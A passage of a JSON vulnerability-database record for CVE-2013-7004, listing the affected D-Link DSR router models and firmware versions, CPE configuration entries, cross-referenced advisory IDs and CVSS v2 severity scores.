        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b35"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-500n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b29"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b46"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b48"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b50"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150 v1.08b44",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b25"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b36"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.01b50"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b43"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.05b48",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b39",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b29",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b39",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64462"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-7004",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.8,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-7004",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15548",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
